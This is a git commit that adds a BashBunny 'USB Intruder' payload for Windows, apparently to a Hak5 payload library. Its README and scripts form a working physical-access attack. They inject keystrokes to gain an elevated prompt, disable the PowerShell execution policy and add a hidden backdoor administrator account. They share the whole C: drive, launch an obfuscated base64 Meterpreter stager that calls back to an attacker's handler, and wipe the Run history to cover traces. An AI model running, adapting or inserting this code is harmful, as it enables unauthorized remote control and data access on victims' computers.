Added USB Intruder payload (#220)

* USB Intruder Initial upload of the USB Intruder v1.1 Tested on Windows 7 and Windows 10. * USB Intruder Updated Readme. Forgot to add a line. * Update...again... Added link for forum comments/discussion. * USB Intruder USB Intruder v1.1 Commit.
2017-05-17 22:52:54 -06:00 · 2017-05-17 22:52:54 -06:00 · 9c527c29c4
parent 9eed215260
commit 9c527c29c4
9 changed files with 154 additions and 0 deletions
--- a/payloads/library/remote_access/USB_Intruder/README.MD
+++ b/payloads/library/remote_access/USB_Intruder/README.MD
@ -0,0 +1,51 @@
+# USB Intruder for BashBunny (and adaptable to TwinDucky)
+
+- Title:         USB Intruder
+- Author:        B0rk
+- Version:       1.1
+- Target:        Windows 7+
+- Props:         Hak5Darren, Diggster, IMcPwn, and many more
+- Category:      Infiltration/Execution
+
+## Description
+
+**THIS PAYLOAD ASSUMES YOUR VICTIM HAS ADMINISTRATOR PRIVILEGES**
+
+Infiltrates a target system and performs the following:
+
+Created a hidden ProgData folder in the %WinDir% (HID)
+Sets powershell execution to unrestricted (HID)
+Copies files from the USB_Intruder directory on the BashBunny to the hidden ProgData folder in the Windows directory (STORAGE)
+Launches seq1.ps1 that launches the following tasks in order
+Creates a new user with the following credentials - pwnie:dungothacked (UAC.bat)
+Sets new user pwnie to local Administrators group (UAC.bat)
+Shares the root of the C: drive with full permissions to the new user pwnie with the label HACKED$ (Hidden) (UAC.bat)
+Hides the new user pwnie from the logon screen (hide.ps1)
+Executes the eject.ps1 file that properly ejects the Mass Storage portion of the payload (eject.ps1)
+Executes a shell.bat file that a Meterpreter script that calls back to the Attacker's Handler (Create/Replace with your own)
+Cleans up the Run dialogue history (HID)
+Sync's the BashBunny for final removal (BB)
+
+**undo.bat is provided to reverse the creation actions above (in case you want to test)**
+
+**Be sure to have your handler ready to accept the incoming connection from the victim**
+
+## Configuration
+
+Replace the shell.bat file in the USB_Intruder folder with your own custom Meterpreter script or what ever payload you would like.
+
+There is always potential for additional scripts to be run from the seq1.bat file, so bolster it with additional jobs.
+
+**You will need to change delays accordingly to the profile of the victim's PC hardware.**
+
+## STATUS
+
+| LED             | Status           |
+| --------------- | ---------------- |
+| Solid White     | Initialization   |
+| Blue Flashing   | HID/Storage Phase|
+| Yellow Flashing | Cleanup of Run   |
+| Green Flashing  | Sync/EOF         |
+| Solid Green     | 100% Complete    |
+
+Discussion and Comments at https://forums.hak5.org/index.php?/topic/40981-payloadusb_intruder/
--- a/payloads/library/remote_access/USB_Intruder/USB_Intruder/UAC.bat
+++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/UAC.bat
@ -0,0 +1,4 @@
+@echo OFF
+net user pwnie dungothacked /add
+net localgroup Administrators pwnie /add
+net share HACKED$=C:\ /grant:pwnie,FULL
--- a/payloads/library/remote_access/USB_Intruder/USB_Intruder/eject.ps1
+++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/eject.ps1
@ -0,0 +1,3 @@
+$BB = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BASHBUNNY' } | Select-Object -First 1 -ExpandProperty Driveletter
+$driveEject = New-Object -comObject Shell.Application
+$driveEject.Namespace(17).ParseName("$BB").InvokeVerb("Eject")
--- a/payloads/library/remote_access/USB_Intruder/USB_Intruder/hide.ps1
+++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/hide.ps1
@ -0,0 +1,2 @@
+$path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
+New-Item $path -Force | New-ItemProperty -Name pwnie -Value 0 -PropertyType DWord -Force
--- a/payloads/library/remote_access/USB_Intruder/USB_Intruder/seq1.ps1
+++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/seq1.ps1
@ -0,0 +1,3 @@
+&"$Env:WinDir\ProgData\UAC.bat"
+&"$Env:WinDir\ProgData\hide.ps1"
+&"$Env:WinDir\ProgData\eject.ps1"
--- a/payloads/library/remote_access/USB_Intruder/USB_Intruder/shell.bat
+++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/shell.bat
@ -0,0 +1,2 @@
+@echo off
+if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")
--- a/payloads/library/remote_access/USB_Intruder/d.cmd
+++ b/payloads/library/remote_access/USB_Intruder/d.cmd
@ -0,0 +1,10 @@
+@echo OFF
+
+REM Setting dst to %BASHBUNNY%\Payload\$Switch_Position\USB_Intruder\
+set dst=%~dp0USB_Intruder
+
+REM Copying files from dst to %WinDir%\ProgData
+xcopy /C /Q /G /Y /S %dst%\*.* %WinDir%\ProgData\
+
+@cls
+@exit
--- a/payloads/library/remote_access/USB_Intruder/payload.txt
+++ b/payloads/library/remote_access/USB_Intruder/payload.txt
@ -0,0 +1,76 @@
+#!/bin/bash
+#
+#TITLE: USB Intruder
+#AUTHOR: B0rk
+#VERSION: 1.1
+#PROPS: Hak5Darren, Diggster, IMcPwn and many more
+#OS: Windows (Requires Powershell and Admin privs)
+#ATTACKMODES: HID STORAGE
+#
+#DESCRIPTION: Opens up attack vectors and a meterpreter powershell script on a Victim PC. **Based on usb_exfiltrator by DK & Friends**
+#
+#LED INDICATORS:
+#White - Initialization
+#Blue Blinking - HID/STORAGE Phase
+#Yellow Blinking - Cleanup
+#Green Blinking - Syncing BB for removal
+#Green - Attack Completion
+
+#Initialization - Setting AttackModes
+LED W
+ATTACKMODE HID STORAGE
+#Initialization Completed
+
+#Beginning of HID/STORAGE Phase
+LED B 10
+#Description::
+Q DELAY 2000
+Q GUI d
+Q DELAY 100
+Q GUI r
+Q DELAY 500
+Q STRING powershell -Command "Start-Process cmd -Verb RunAs"
+Q ENTER
+Q DELAY 1000
+Q ALT y
+Q DELAY 800
+Q STRING mkdir C:\\Windows\\ProgData
+Q ENTER
+Q STRING attrib +h C:\\Windows\\ProgData
+Q ENTER
+Q STRING powershell
+Q ENTER
+Q DELAY 800
+Q STRING Set-ExecutionPolicy Unrestricted
+Q ENTER
+Q STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
+Q ENTER
+Q DELAY 2000
+Q STRING cd \$Env:WinDir\\ProgData
+Q ENTER
+Q STRING .\\seq1.ps1
+Q ENTER
+Q DELAY 1000
+Q STRING powershell -WindowStyle Hidden \$Env:WinDir\ProgData\shell.bat
+Q ENTER
+Q STRING exit
+Q ENTER
+Q STRING exit
+Q ENTER
+Q DELAY 500
+#End of HID/STORAGE Phase
+
+#Cleanup
+LED Y 100
+#Clears complete run history
+Q GUI r
+Q DELAY 500
+Q STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
+Q ENTER
+#End of Cleanup
+
+#Completion of script
+LED G 100
+sync
+LED G
+#Completed
--- a/payloads/library/remote_access/USB_Intruder/undo.bat
+++ b/payloads/library/remote_access/USB_Intruder/undo.bat
@ -0,0 +1,3 @@
+net user pwnie /delete
+net share HACKED$ /delete
+RD /S /Q %windir%\ProgData